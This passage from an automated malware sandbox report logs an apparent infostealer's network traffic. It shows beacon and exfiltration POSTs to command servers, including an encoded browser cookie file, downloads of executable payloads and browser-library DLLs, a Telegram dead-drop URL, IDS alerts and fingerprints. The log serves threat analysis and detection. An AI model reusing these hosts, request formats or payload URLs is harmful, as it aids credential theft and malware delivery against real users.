73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 38 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="mode"51------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="task_id"1023588------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="status"1------BFIDGHDBAFIJJJJKJDHD--
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 2d 2d 0d 0a Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="mode"51------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="task_id"1023589------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="status"1------KKKEBKJJDGHCBGCAAKEH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="mode"6------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: stadiatechnologies.comContent-Length: 3225Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKEHJEGCFCAKFIIJJJHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="mode"1------GHJKEHJEGCFCAKFIIJJJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="mode"2------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="mode"21------EHDBGDHDAECBGDHJKFID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 147.45.68.138Content-Length: 8081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="file_name"Q29va2ll

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 95.164.119.162 95.164.119.162

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49710 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49734 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kxNpgzCHIQX.RGCAsbyPpea8VQ8zTqPRZLmy2FiWcC4-1724878516-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_XOQbUhQrJ6L1xvGO.BLgMQMbLZJ8u_sHe.5Wkz2_pk-1724878566-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

3_2_00405000

Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache

